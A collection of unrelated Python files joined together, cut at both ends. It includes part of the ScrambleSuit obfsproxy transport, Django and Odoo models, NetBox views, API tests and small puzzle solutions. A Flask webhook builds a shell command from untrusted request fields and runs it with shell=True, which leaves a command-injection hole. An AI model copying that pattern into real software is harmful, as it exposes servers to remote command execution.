seed=msg.payload)
self.pktMorpher = packetmorpher.new(pktDist)
self.iatMorpher = probdist.new(lambda: prng.random() %
const.MAX_PACKET_DELAY,
seed=msg.payload)
else:
log.warning("Invalid message flags: %d." % msg.flags)
def flushSendBuffer( self ):
"""
Flush the application's queued data.
The application could have sent data while we were busy authenticating
the remote machine. This method flushes the data which could have been
queued in the meanwhile in `self.sendBuf'.
"""
if len(self.sendBuf) == 0:
log.debug("Send buffer is empty; nothing to flush.")
return
# Flush the buffered data, the application is so eager to send.
log.debug("Flushing %d bytes of buffered application data." %
len(self.sendBuf))
self.sendRemote(self.sendBuf)
self.sendBuf = ""
def receiveTicket( self, data ):
"""
Extract and verify a potential session ticket.
The given `data' is treated as a session ticket. The ticket is being
decrypted and authenticated (yes, in that order). If all these steps
succeed, `True' is returned. Otherwise, `False' is returned.
"""
if len(data) < (const.TICKET_LENGTH + const.MARK_LENGTH +
const.HMAC_SHA256_128_LENGTH):
return False
potentialTicket = data.peek()
# Now try to decrypt and parse the ticket. We need the master key
# inside to verify the HMAC in the next step.
if not self.decryptedTicket:
newTicket = ticket.decrypt(potentialTicket[:const.TICKET_LENGTH],
self.srvState)
if newTicket != None and newTicket.isValid():
self.deriveSecrets(newTicket.masterKey)
self.decryptedTicket = True
else:
return False
# First, find the mark to efficiently locate the HMAC.
mark = mycrypto.HMAC_SHA256_128(self.recvHMAC,
potentialTicket[:const.TICKET_LENGTH])
index = util.locateMark(mark, potentialTicket)
if not index:
return False
# Now, verify if the HMAC is valid.
existingHMAC = potentialTicket[index + const.MARK_LENGTH:
index + const.MARK_LENGTH +
const.HMAC_SHA256_128_LENGTH]
myHMAC = mycrypto.HMAC_SHA256_128(self.recvHMAC,
potentialTicket[0:
index + const.MARK_LENGTH] +
util.getEpoch())
if not util.isValidHMAC(myHMAC, existingHMAC, self.recvHMAC):
log.warning("The HMAC is invalid: `%s' vs. `%s'." %
(myHMAC.encode('hex'), existingHMAC.encode('hex')))
return False
# Do nothing if the ticket is replayed. Immediately closing the
# connection would be suspicious.
if self.srvState.isReplayed(existingHMAC):
log.warning("The HMAC was already present in the replay table.")
return False
data.drain(index + const.MARK_LENGTH + const.HMAC_SHA256_128_LENGTH)
log.debug("Adding the HMAC authenticating the ticket message to the " \
"replay table: %s." % existingHMAC.encode('hex'))
self.srvState.registerKey(existingHMAC)
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
return True
def receivedUpstream( self, data ):
"""
Sends data to the remote machine or queues it to be sent later.
Depending on the current protocol state, the given `data' is either
directly sent to the remote machine or queued. The buffer is then
flushed once, a connection is established.
"""
if self.protoState == const.ST_CONNECTED:
self.sendRemote(data.read())
# Buffer data we are not ready to transmit yet.
else:
self.sendBuf += data.read()
log.debug("Buffered %d bytes of outgoing data." %
len(self.sendBuf))
def sendTicketAndSeed( self ):
"""
Send a session ticket and the PRNG seed to the client.
This method is only called by the server after successful
authentication. Finally, the server's send buffer is flushed.
"""
log.debug("Sending a new session ticket and the PRNG seed to the " \
"client.")
self.sendRemote(ticket.issueTicketAndKey(self.srvState),
flags=const.FLAG_NEW_TICKET)
self.sendRemote(self.srvState.prngSeed,
flags=const.FLAG_PRNG_SEED)
self.flushSendBuffer()
def receivedDownstream( self, data ):
"""
Receives and processes data coming from the remote machine.
The incoming `data' is dispatched depending on the current protocol
state and whether we are the client or the server. The data is either
payload or authentication data.
"""
if self.weAreServer and (self.protoState == const.ST_WAIT_FOR_AUTH):
# First, try to interpret the incoming data as session ticket.
if self.receiveTicket(data):
log.debug("Ticket authentication succeeded.")
self.sendTicketAndSeed()
# Second, interpret the data as a UniformDH handshake.
elif self.uniformdh.receivePublicKey(data, self.deriveSecrets,
self.srvState):
# Now send the server's UniformDH public key to the client.
handshakeMsg = self.uniformdh.createHandshake()
log.debug("Sending %d bytes of UniformDH handshake and "
"session ticket." % len(handshakeMsg))
self.circuit.downstream.write(handshakeMsg)
log.debug("UniformDH authentication succeeded.")
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.sendTicketAndSeed()
else:
log.debug("Authentication unsuccessful so far. "
"Waiting for more data.")
return
elif self.weAreClient and (self.protoState == const.ST_WAIT_FOR_AUTH):
if not self.uniformdh.receivePublicKey(data, self.deriveSecrets):
log.debug("Unable to finish UniformDH handshake just yet.")
return
log.debug("UniformDH authentication succeeded.")
log.debug("Switching to state ST_CONNECTED.")
self.protoState = const.ST_CONNECTED
self.flushSendBuffer()
if self.protoState == const.ST_CONNECTED:
self.processMessages(data.read())
@classmethod
def register_external_mode_cli( cls, subparser ):
"""
Register a CLI arguments to pass a secret or ticket to ScrambleSuit.
Two options are made available over the command line interface: one to
specify a ticket file and one to specify a UniformDH shared secret.
"""
subparser.add_argument("--password",
required=True,
type=str,
help="Shared secret for UniformDH",
dest="uniformDHSecret")
super(ScrambleSuitTransport, cls).register_external_mode_cli(subparser)
@classmethod
def validate_external_mode_cli( cls, args ):
"""
Assign the given command line arguments to local variables.
"""
uniformDHSecret = None
try:
uniformDHSecret = base64.b32decode(util.sanitiseBase32(
args.uniformDHSecret))
except (TypeError, AttributeError) as error:
log.error(error.message)
raise base.PluggableTransportError(
"UniformDH password '%s' isn't valid base32!"
% args.uniformDHSecret)
parentalApproval = super(
ScrambleSuitTransport, cls).validate_external_mode_cli(args)
if not parentalApproval:
# XXX not very descriptive nor helpful, but the parent class only
# returns a boolean without telling us what's wrong.
raise base.PluggableTransportError(
"Pluggable Transport args invalid: %s" % args )
if uniformDHSecret:
rawLength = len(uniformDHSecret)
if rawLength != const.SHARED_SECRET_LENGTH:
raise base.PluggableTransportError(
"The UniformDH password must be %d bytes in length, ",
"but %d bytes are given."
% (const.SHARED_SECRET_LENGTH, rawLength))
else:
cls.uniformDHSecret = uniformDHSecret
def handle_socks_args( self, args ):
"""
Receive arguments `args' passed over a SOCKS connection.
The SOCKS authentication mechanism is (ab)used to pass arguments to
pluggable transports. This method receives these arguments and parses
them. As argument, we only expect a UniformDH shared secret.
"""
log.debug("Received the following arguments over SOCKS: %s." % args)
if len(args) != 1:
raise base.SOCKSArgsError("Too many SOCKS arguments "
"(expected 1 but got %d)." % len(args))
# The ScrambleSuit specification defines that the shared secret is
# called "password".
if not args[0].startswith("password="):
raise base.SOCKSArgsError("The SOCKS argument must start with "
"`password='.")
# A shared secret might already be set if obfsproxy is in external
# mode.
if self.uniformDHSecret:
log.warning("A UniformDH password was already specified over "
"the command line. Using the SOCKS secret instead.")
self.uniformDHSecret = base64.b32decode(util.sanitiseBase32(
args[0].split('=')[1].strip()))
rawLength = len(self.uniformDHSecret)
if rawLength != const.SHARED_SECRET_LENGTH:
raise base.PluggableTransportError("The UniformDH password "
"must be %d bytes in length but %d bytes are given." %
(const.SHARED_SECRET_LENGTH, rawLength))
self.uniformdh = uniformdh.new(self.uniformDHSecret, self.weAreServer)
class ScrambleSuitClient( ScrambleSuitTransport ):
"""
Extend the ScrambleSuit class.
"""
def __init__( self ):
"""
Initialise a ScrambleSuitClient object.
"""
ScrambleSuitTransport.__init__(self)
class ScrambleSuitServer( ScrambleSuitTransport ):
"""
Extend the ScrambleSuit class.
"""
def __init__( self ):
"""
Initialise a ScrambleSuitServer object.
"""
ScrambleSuitTransport.__init__(self)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import datetime
import time
def print_time(func):
# function
def function_1(x, y):
# parameters
print datetime.datetime.now()
res = func(x, y)
print datetime.datetime.now()
return res
return function_1
@print_time
def add(x, y):
time.sleep(1)
res = x + y
return res
add(1, 2)
|
def palindromeRearranging(inputString):
w=''.join(sorted(inputString))
if w==inputString and len(w)%2==1: #edge case:string consists of only one unique character
return True
if len(w)%2==0:
for char in w:
if w.count(char)%2!=0:
return False
return True
else: #if string is odd num of chars
flag=False #marks whether the single-occurrence char has been seen yet
for char in w:
if w.count(char)%2!=0:
if flag:
return False
else:
flag=True
return True
"""
a='madam'
b='racecar'
c='amanaplanacanalpanamarrrrff'
d='zzzz'
e='ppppp'
print(palindromeRearranging("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabc"))
"""
|
import starkbank
from unittest import TestCase, main
from starkcore.error import InputErrors
from tests.utils.user import exampleProject
starkbank.user = exampleProject
class TestDarfPaymentLogGet(TestCase):
def test_success(self):
logs = list(starkbank.darfpayment.log.query(limit=10))
logs = list(starkbank.darfpayment.log.query(limit=10, payment_ids={log.payment.id for log in logs}, types={log.type for log in logs}))
for log in logs:
print(log)
print("Number of logs:", len(logs))
class TestDarfPaymentLogPage(TestCase):
def test_success(self):
cursor = None
ids = []
for _ in range(2):
logs, cursor = starkbank.darfpayment.log.page(limit=2, cursor=cursor)
for log in logs:
print(log)
self.assertFalse(log.id in ids)
ids.append(log.id)
if cursor is None:
break
self.assertTrue(len(ids) == 4)
class TestDarfPaymentLogInfoGet(TestCase):
def test_success(self):
logs = starkbank.darfpayment.log.query()
log_id = next(logs).id
log = starkbank.darfpayment.log.get(log_id)
if __name__ == '__main__':
main()
|
def is_sequence(arg):
"""
Check whether an argument is iterable, but not a string.\n
:param arg: argument to check
:return: True if the argument is a non-string, iterable.
"""
return not(hasattr(arg, "strip") and
(hasattr(arg, "__getitem__") or
hasattr(arg, "__iter__")))
|
"""
Well Registry ORM object.
"""
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.db import models
from smart_selects.db_fields import ChainedForeignKey
class ArbitraryDecimalFields(models.DecimalField):
"""
Subclass to implement arbitrary precision decimal field in Postgres
See https://steve.dignam.xyz/2019/10/24/arbitrary-precision-decimal-fields/
"""
def _check_decimal_places(self):
return []
def _check_max_digits(self):
return []
def _check_decimal_places_and_max_digits(self, **kwargs):
return []
def db_type(self, connection):
# pg or bust
assert connection.settings_dict["ENGINE"] == "django.db.backends.postgresql"
return "numeric"
class AgencyLookup(models.Model):
"""Model definition for the agency table, lookup only"""
agency_cd = models.CharField(max_length=50, unique=True)
agency_nm = models.CharField(max_length=150, blank=True, null=True)
agency_med = models.CharField(max_length=200, blank=True, null=True)
class Meta:
db_table = 'agency'
ordering = ['agency_nm']
def __str__(self):
return self.agency_nm
class AltitudeDatumLookup(models.Model):
"""Model definition for the altitude_datum table, lookup only"""
adatum_cd = models.CharField(max_length=10, unique=True)
adatum_desc = models.CharField(max_length=100, blank=True, null=True)
class Meta:
db_table = 'altitude_datum'
ordering = ['adatum_cd']
def __str__(self):
return self.adatum_cd
class CountryLookup(models.Model):
"""Model definition for the country table, lookup only"""
country_cd = models.CharField(unique=True, max_length=2)
country_nm = models.CharField(max_length=48)
class Meta:
db_table = 'country'
ordering = ['country_nm']
def __str__(self):
return self.country_nm
class CountyLookup(models.Model):
"""Model definition for the county table, lookup only"""
country_cd = models.ForeignKey('CountryLookup', on_delete=models.PROTECT, db_column='country_cd',
to_field='country_cd')
state_id = models.ForeignKey('StateLookup', on_delete=models.PROTECT, db_column='state_id')
county_cd = models.CharField(max_length=3)
county_nm = models.CharField(max_length=48)
class Meta:
db_table = 'county'
ordering = ['county_nm']
unique_together = (('country_cd', 'state_id', 'county_cd'),)
def __str__(self):
return self.county_nm
class HorizontalDatumLookup(models.Model):
"""Model definition for the horizontal_datum table, lookup only"""
hdatum_cd = models.CharField(max_length=10, unique=True)
hdatum_desc = models.CharField(max_length=100, blank=True, null=True)
class Meta:
db_table = 'horizontal_datum'
ordering = ['hdatum_cd']
def __str__(self):
return self.hdatum_cd
class NatAqfrLookup(models.Model):
"""Model definition for the nat_aqfr table, lookup only"""
nat_aqfr_cd = models.CharField(unique=True, max_length=10)
nat_aqfr_desc = models.CharField(blank=True, null=True, max_length=100)
class Meta:
db_table = 'nat_aqfr'
ordering = ['nat_aqfr_desc']
def __str__(self):
return self.nat_aqfr_desc
class StateLookup(models.Model):
"""Model definition for the state table, lookup only"""
country_cd = models.ForeignKey('CountryLookup', on_delete=models.PROTECT, db_column='country_cd',
to_field='country_cd')
state_cd = models.CharField(max_length=2)
state_nm = models.CharField(max_length=53)
class Meta:
db_table = 'state'
ordering = ['state_nm']
unique_together = (('country_cd', 'state_cd'),)
def __str__(self):
return self.state_nm
class UnitsLookup(models.Model):
"""Model definition for the units_dim table, lookup only"""
unit_id = models.IntegerField(unique=True)
unit_desc = models.CharField(max_length=20, blank=True, null=True)
class Meta:
db_table = 'units'
ordering = ['unit_desc']
def __str__(self):
return self.unit_desc
WELL_TYPES = [('Surveillance', 'Surveillance'), ('Trend', 'Trend'), ('Special', 'Special')]
WELL_CHARACTERISTICS = [('Background', 'Background'),
('Suspected/Anticipated Changes', 'Suspected/Anticipated Changes'),
('Known Changes', 'Known Changes')]
WELL_PURPOSES = [('Dedicated Monitoring/Observation', 'Dedicated Monitoring/Observation'), ('Other', 'Other')]
non_blank_validator = RegexValidator(
r'\S[\s\S]*',
message='Field must not be blank')
class MonitoringLocation(models.Model):
"""
Django Registry Model.
"""
display_flag = models.BooleanField(default=False, verbose_name='Display Site?')
agency = models.ForeignKey(AgencyLookup, on_delete=models.PROTECT, db_column='agency_cd', null=True,
to_field='agency_cd')
site_no = models.CharField(max_length=16, validators=[non_blank_validator])
site_name = models.CharField(max_length=300, validators=[non_blank_validator])
country = models.ForeignKey(CountryLookup, on_delete=models.PROTECT, db_column='country_cd',
null=True, blank=True, to_field='country_cd')
state = ChainedForeignKey(StateLookup,
chained_field="country",
chained_model_field="country_cd",
show_all=False,
auto_choose=True,
sort=True,
on_delete=models.PROTECT, db_column='state_id', null=True)
county = ChainedForeignKey(CountyLookup,
chained_field="state",
chained_model_field="state_id",
show_all=False,
auto_choose=True,
sort=True,
on_delete=models.PROTECT,
db_column='county_id', null=True)
dec_lat_va = ArbitraryDecimalFields(null=True, verbose_name='Latitude(decimal degrees)')
dec_long_va = ArbitraryDecimalFields(null=True, verbose_name='Longitude(decimal degrees)')
horizontal_datum = models.ForeignKey(HorizontalDatumLookup, on_delete=models.PROTECT,
db_column='horizontal_datum_cd', null=True,
to_field='hdatum_cd')
horz_method = models.CharField(max_length=300, blank=True, verbose_name='Lat/Long method')
horz_acy = models.CharField(max_length=300, blank=True, verbose_name='Lat/Long accuracy')
alt_va = ArbitraryDecimalFields(null=True, verbose_name='Altitude')
altitude_units = models.ForeignKey(UnitsLookup, on_delete=models.PROTECT, db_column='altitude_units',
to_field='unit_id', null=True)
altitude_datum = models.ForeignKey(AltitudeDatumLookup, on_delete=models.PROTECT,
db_column='altitude_datum_cd', null=True,
to_field='adatum_cd')
alt_method = models.CharField(max_length=300, blank=True, verbose_name='Altitude method')
alt_acy = models.CharField(max_length=300, blank=True, verbose_name='Altitude accuracy')
well_depth = ArbitraryDecimalFields(null=True, blank=False)
well_depth_units = models.ForeignKey(UnitsLookup, related_name='+', db_column='well_depth_units',
on_delete=models.PROTECT, to_field='unit_id', null=True, blank=False)
nat_aqfr = models.ForeignKey(NatAqfrLookup, on_delete=models.PROTECT, db_column='nat_aqfr_cd',
to_field='nat_aqfr_cd', null=True, verbose_name='National aquifer')
local_aquifer_name = models.CharField(max_length=100, blank=True)
site_type = models.CharField(max_length=10, choices=[('WELL', 'Well'), ('SPRING', 'Spring')])
aqfr_type = models.CharField(max_length=10, blank=True, db_column='aqfr_char',
choices=[('CONFINED', 'Confined'), ('UNCONFINED', 'Unconfined')],
verbose_name='Aquifer type')
wl_sn_flag = models.BooleanField(default=False, verbose_name='In water-level sub-network?')
wl_network_name = models.CharField(max_length=50, blank=True, db_column='wl_sys_name',
verbose_name='Water-level network name')
wl_baseline_flag = models.BooleanField(default=False, verbose_name='Water-level baseline?')
wl_well_type = models.CharField(max_length=32, blank=True, choices=WELL_TYPES,
verbose_name='Water-level well type')
wl_well_chars = models.CharField(max_length=32, blank=True, choices=WELL_CHARACTERISTICS,
verbose_name='Water-level well characteristics')
wl_well_purpose = models.CharField(max_length=32, blank=True, choices=WELL_PURPOSES,
verbose_name='Water-level well purpose')
wl_well_purpose_notes = models.CharField(max_length=4000, blank=True, verbose_name='Water-level well purpose notes')
qw_sn_flag = models.BooleanField(default=False, verbose_name='In water quality sub-network?')
qw_network_name = models.CharField(max_length=50, blank=True, db_column='qw_sys_name',
verbose_name='Water quality network name')
qw_baseline_flag = models.BooleanField(default=False, verbose_name='Water quality baseline?')
qw_well_type = models.CharField(max_length=32, blank=True, choices=WELL_TYPES,
verbose_name='Water quality well type')
qw_well_chars = models.CharField(max_length=32, blank=True, choices=WELL_CHARACTERISTICS,
verbose_name='Water quality well characteristics')
qw_well_purpose = models.CharField(max_length=32, blank=True, choices=WELL_PURPOSES,
verbose_name='Water quality well purpose')
qw_well_purpose_notes = models.CharField(max_length=4000, blank=True,
verbose_name='Water quality well purpose notes')
link = models.CharField(max_length=500, blank=True)
insert_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.PROTECT, editable=False,
related_name='+')
update_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, on_delete=models.PROTECT, editable=False,
related_name='+')
insert_date = models.DateTimeField(auto_now_add=True, editable=False)
update_date = models.DateTimeField(auto_now=True, editable=False)
class Meta:
unique_together = (('site_no', 'agency'),)
def clean(self):
"""
Override model clean to do multi field validation
"""
if self.site_type == 'WELL' and self.aqfr_type == '':
raise ValidationError(
'If the site is of type "WELL", then you must enter an Aquifer type')
if (self.display_flag and self.wl_sn_flag) and \
(self.wl_well_type == '' or self.wl_well_purpose == ''):
raise ValidationError(
'If the well is In WL sub-network, then you must enter a WL well type and WL well purpose')
if (self.display_flag and self.wl_sn_flag and
self.wl_baseline_flag and self.wl_well_chars == ''):
raise ValidationError(
'If the well is in WL sub-network and in WL Baseline, then you must enter WL Well Characteristics')
if (self.display_flag and self.qw_sn_flag) and \
(self.qw_well_type == '' or self.qw_well_purpose == ''):
raise ValidationError(
'If the well is In QW sub-network, then you must enter a QW well type and QW well purpose')
if (self.display_flag and self.qw_sn_flag and
self.qw_baseline_flag and self.qw_well_chars == ''):
raise ValidationError(
'If the well is in QW sub-network and in WL Baseline, then you must enter QW Well Characteristics')
def __str__(self):
"""Default string."""
str_rep = f'{self.agency}:{self.site_no}'
return str_rep
|
#!/usr/bin/python3
from pprint import pprint
from subprocess import Popen, PIPE
import sys
from flask import Flask, url_for, jsonify, request, send_from_directory, abort
app = Flask(__name__)
@app.route("/",methods=['POST'])
def echo():
json = request.get_json()
repo_name = json['repository']['name']
repo_url = json['repository']['git_url']
print('{} just got updated! {}'.format(repo_name,repo_url))
cmd = "pushEGGL {} {}".format(repo_name,repo_url)
# Pass the info to the bash script
try:
p = Popen(cmd,stdout=sys.stdout, stderr=sys.stderr, shell=True)
p.wait()
if p.returncode != 0:
print('Could not update the mirror for {}'.format(repo_name))
except Exception as e:
print('Could not update the mirror for {}: {}'.format(repo_name,e))
return jsonify([])
if __name__ == '__main__':
app.run(debug=False,host='0.0.0.0',port=57283)
|
from scrapy import Spider
from bcp.items import NewsItemLoader
class LaRepublicaSpider(Spider):
name = 'la_republica'
start_urls = [
'https://larepublica.pe/politica/1421312-pedro-chavarry-fiscal-pedir-prision-preventiva-extitular-ministerio-publico-yvan-montoya',
]
def parse(self, response):
nl = NewsItemLoader(response=response)
nl.add_xpath('title', '//h1')
nl.add_xpath('content', '//div[has-class("content-post")]')
nl.add_xpath('image', '//span[has-class("atm_Img-cover")]/picture/source[@media="(min-width: 650px)"]/@srcset')
nl.add_value('url', response.url)
yield nl.load_item() |
# 거스름돈
coins = [500, 100, 50, 10, 5, 1]
n = 1000 - int(input())
cnt = 0
for coin in coins:
cnt += n // coin
n %= coin
print(cnt) |
from django.shortcuts import get_object_or_404, render
from django.views import View
from django.utils import timezone
from utilities.views import GetReturnURLMixin
from netbox_plugin_gpon.netbox_plugin_gpon.views.generic import *
from . import forms
from .models import *
from . import tables
from . import filters
class HomeView(View):
template_name = "netbox_plugin_gpon/home.html"
def get(self, request):
olts = OLT.objects.all()
olt_table = tables.OLTTable(olts)
RequestConfig(request, paginate={"per_page": 20}).configure(olt_table)
onts = ONT.objects.all()
ont_table = tables.ONTTable(onts)
RequestConfig(request, paginate={"per_page": 20}).configure(ont_table)
gponsplitters = GPONSplitter.objects.all()
gponsplitters_table = tables.GPONSplitterTable(gponsplitters)
RequestConfig(request, paginate={"per_page": 20}).configure(gponsplitters_table)
return render(request, self.template_name,{
'olt_table': olt_table,
'ont_table': ont_table,
'gponsplitters_table': gponsplitters_table,
})
class OLTListView(ObjectListView, View):
alt_title="OLTs"
queryset = OLT.objects.all()
table = tables.OLTTable
filterset = filters.OLTFilterSet
filterset_form = forms.OLTFilterForm
class OLTEditView(ObjectEditView, View):
alt_title = "OLT"
queryset = OLT.objects.all()
model_form = forms.OLTForm
class OLTView(ObjectView):
alt_title = "OLT"
queryset = OLT.objects.all()
def get(self, request, *args, **kwargs):
current_olt = get_object_or_404(self.queryset, **kwargs)
splitters = GPONSplitter.objects.filter(object_id=current_olt.pk)
splitter_table = tables.GPONSplitterTable(splitters)
RequestConfig(request, paginate={"per_page": 5}).configure(splitter_table)
#outer_list=splitters
#inner_list=nids
#return a list of nids whose FK corresponds to one of the splitters linked to this OLT
onts = [nid for splitter in splitters for nid in splitter.ont_set.all()]
ont_table = tables.ONTTable(onts)
#RequestConfig(request, paginate={"per_page": 25}).configure(ont_table)
return render(
request,
self.get_template_name(),
{
"object": current_olt,
"splitter_table": splitter_table,
"splitter_count": len(splitters),
"ont_table": ont_table,
"ont_count": len(onts),
},
)
class ONTListView(ObjectListView, View):
alt_title = "ONTs"
queryset = ONT.objects.all()
table = tables.ONTTable
filterset = filters.ONTFilterSet
filterset_form = forms.ONTFilterForm
class ONTEditView(ObjectEditView, View):
alt_title = "ONT"
queryset = ONT.objects.all()
model_form = forms.ONTForm
class GPONSplitterListView(ObjectListView, View):
alt_title = "GPON Splitters"
queryset = GPONSplitter.objects.all()
table = tables.GPONSplitterTable
filterset = filters.GPONSplitterFilterSet
filterset_form = forms.GPONSplitterFilterForm
class GPONSplitterEditView(ObjectEditView, View):
alt_title = "GPON Splitter"
queryset = GPONSplitter.objects.all()
model_form = forms.GPONSplitterForm
|
# https://leetcode.com/problems/implement-strstr/description/
class Solution(object):
def strStr(self, haystack, needle):
"""
:type haystack: str
:type needle: str
:rtype: int
"""
if not needle:
return 0
haystack_len = len(haystack)
needle_len = len(needle)
if haystack_len < needle_len:
return -1
for idx in range(0, haystack_len - needle_len + 1):
if haystack[idx:idx+needle_len] == needle:
return idx
return -1
|
#!/usr/bin/env
from __future__ import print_function
import argparse
def bin(s):
return str(s) if s<=1 else bin(s>>1) + str(s&1)
def get_muggle_expr(number):
result = ""
bin_number = bin(number)
for i in xrange(0, len(bin_number)):
if bin_number[i] == "1":
order = len(bin_number) - i
part = ""
if order == 1:
part = "2 / 2"
else:
part = " * ".join(["2" for i in xrange(1, order)])
if len(result) != 0:
result += " + "
result += part
if len(result) == 0:
result = "2 - 2"
return result
def main():
parser = argparse.ArgumentParser(description='Removes any magic from any integer numbers.')
parser.add_argument('integers', metavar='integers', type=int, nargs='+')
args = parser.parse_args()
for num in args.integers:
print(get_muggle_expr(num))
if __name__ == "__main__":
main()
|
from core.object import Object
from physics.rect import Rect
from graphics.prims3d.cube import Cube
from core.vec2 import Vec2
from core.vec3 import Vec3
class Block(Rect):
def onAttach(self):
self.defaultVar("material",{})
self.defaultVar("stretchMaterial",True)
self.defaultVar("staticBody",True)
self.defaultVar("friction",1)
Rect.onAttach(self)
scale = Vec3(self.bodySize.x,self.bodySize.y,1)
if self.stretchMaterial:
self.material['scale'] = self.bodySize
self.graphics = Cube(parent = self,
vars = dict(scale = scale,
material = self.material))
|
# -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from company import WEEK_DAYS
class SubActivityStartingTime(models.Model):
_name = 'op.subactivity.starting.time'
_description = 'A set of subactivity has a set of preferred starting Time.'
_rec_name = 'faculty_id'
@api.multi
def set_not_available(self):
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
if day_config:
for l in self.subactivity_starting_line_ids:
if day_config.tt_monday:
l.monday = 1
if day_config.tt_tuesday:
l.tuesday = 1
if day_config.tt_wednesday:
l.wednesday = 1
if day_config.tt_thursday:
l.thursday = 1
if day_config.tt_friday:
l.friday = 1
if day_config.tt_saturday:
l.saturday = 1
if day_config.tt_sunday:
l.sunday = 1
@api.multi
def set_available(self):
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
if day_config:
for l in self.subactivity_starting_line_ids:
if day_config.tt_monday:
l.monday = 0
if day_config.tt_tuesday:
l.tuesday = 0
if day_config.tt_wednesday:
l.wednesday = 0
if day_config.tt_thursday:
l.thursday = 0
if day_config.tt_friday:
l.friday = 0
if day_config.tt_saturday:
l.saturday = 0
if day_config.tt_sunday:
l.sunday = 0
@api.model
def create(self, values):
if len(values['subactivity_starting_line_ids']) == 0:
raise UserError(_("Please configure Timetable Days to create your Activity Starting Time."))
starting_obj = self.env['op.faculty.class.list'].search([('list_id', '=', values['faculty_id']), ('batch_id', '=', values['student_id']), ('subject_id', '=', values['subject_id']), ('activity_tag', 'in', values['activity_tag_id'])])
if not starting_obj:
raise UserError(_("There is no activity for the given details. Please choose another!."))
res = super(SubActivityStartingTime, self).create(values)
return res
@api.model
def default_line(self):
period_list = []
period_dict = {}
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
for time in self.env['op.timing'].search([]):
if day_config:
period_dict = {
'name': time.name,
'is_monday': day_config.tt_monday,
'is_tuesday': day_config.tt_tuesday,
'is_wednesday': day_config.tt_wednesday,
'is_thursday': day_config.tt_thursday,
'is_friday': day_config.tt_friday,
'is_saturday': day_config.tt_saturday,
'is_sunday': day_config.tt_sunday
}
period_list.append((0, 0, period_dict))
return period_list
@api.multi
@api.constrains('subactivity_starting_line_ids')
def _check_room_not_available_line(self):
for record in self:
flag = any([True for line in record.subactivity_starting_line_ids for d in WEEK_DAYS if getattr(
line, d) != 0 and getattr(line, d) != 1])
if flag:
raise UserError(_("The Value should be 1 or 0."))
@api.onchange('faculty_id')
def onchange_faculty(self):
res = {}
if self.faculty_id:
sub_list = []
batch_list = []
tag_list = []
obj = self.env['op.faculty.class.list'].search([('list_id','=',self.faculty_id.id)])
for fac in obj:
sub_list.append(fac.subject_id.id)
batch_list.append(fac.batch_id.id)
for tag in fac.activity_tag:
tag_list.append(tag.id)
res['domain'] = {'subject_id': [('id', 'in', sub_list)],'student_id':[('id','in',batch_list)],'activity_tag_id':[('id','in',tag_list)]}
self.subject_id = False
self.student_id = False
self.activity_tag_id = False
return res
@api.onchange('student_id')
def onchange_batch(self):
res = {}
if self.student_id:
ids = self.student_id.group_ids.mapped('id')
res['domain'] = {'group_id': [('id', 'in', ids)]}
self.group_id = False
self.subgroup_id = False
return res
@api.onchange('group_id')
def onchange_group(self):
res = {}
if self.group_id:
ids = self.group_id.subgroup_ids.mapped('id')
res['domain'] = {'subgroup_id': [('id', 'in', ids)]}
self.subgroup_id = False
return res
faculty_id = fields.Many2one('op.faculty', "Faculty", required=1)
student_id = fields.Many2one('op.batch', "Batch", required=1)
subject_id = fields.Many2one('op.subject', "Subject", required=1)
activity_tag_id = fields.Many2one(
'op.activity.tags', "Activity Tag", required=1)
weight = fields.Integer("Weight Percentage", default=100)
split_count = fields.Integer("Split Component", default=1)
group_id = fields.Many2one('op.batch.group', "Group")
subgroup_id = fields.Many2one('op.batch.subgroup', "Subgroup")
subactivity_starting_line_ids = fields.One2many(
'op.subactivity.starting.time.line', 'subactivity_starting_time_id', "Subactivity Startimg Time Line", default=default_line)
class SubActivityStartingTimeLine(models.Model):
_name = 'op.subactivity.starting.time.line'
_description = 'Subactivity Starting Time Line'
name = fields.Char("Periods", required=1)
monday = fields.Integer("Monday", size=1)
tuesday = fields.Integer("Tuesday", size=1)
wednesday = fields.Integer("Wednesday", size=1)
thursday = fields.Integer("Thursday", size=1)
friday = fields.Integer("Friday", size=1)
saturday = fields.Integer("Saturday", size=1)
sunday = fields.Integer("Sunday", size=1)
is_monday = fields.Boolean("Monday?")
is_tuesday = fields.Boolean("Tuesday?")
is_wednesday = fields.Boolean("Wednesday?")
is_thursday = fields.Boolean("Thursday?")
is_friday = fields.Boolean("Friday?")
is_saturday = fields.Boolean("Saturday?")
is_sunday = fields.Boolean("Sunday?")
subactivity_starting_time_id = fields.Many2one(
'op.subactivity.starting.time', "Subactivity Starting Time")
class SubActivitiesTimeSlots(models.Model):
_name = 'op.subactivities.timeslots'
_description = 'A set of subactivities has a set of preferred time slots.'
_rec_name = 'faculty_id'
@api.multi
def set_not_available(self):
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
if day_config:
for l in self.subactivities_timeslots_line_ids:
if day_config.tt_monday:
l.monday = 1
if day_config.tt_tuesday:
l.tuesday = 1
if day_config.tt_wednesday:
l.wednesday = 1
if day_config.tt_thursday:
l.thursday = 1
if day_config.tt_friday:
l.friday = 1
if day_config.tt_saturday:
l.saturday = 1
if day_config.tt_sunday:
l.sunday = 1
@api.multi
def set_available(self):
day_config = self.env['res.company'].search(
[('id', '=', self.env.user.company_id.id)])
if day_config:
for l in self.subactivities_timeslots_line_ids:
if day_config.tt_monday:
l.monday = 0
if day_config.tt_tuesday:
l.tuesday = 0
if day_config.tt_wednesday:
l.wednesday = 0
if day_config.tt_thursday:
l.thursday = 0
if day_config.tt_friday:
l.friday = 0
if day_config.tt_saturday:
l.saturday = 0
if day_config.tt_sunday:
l.sunday = 0
@api.model
def create(self, values):
if len(values['subactivities_timeslots_line_ids']) == 0:
raise UserError(_("Please configure Timetable Days to create your activity time slots."))
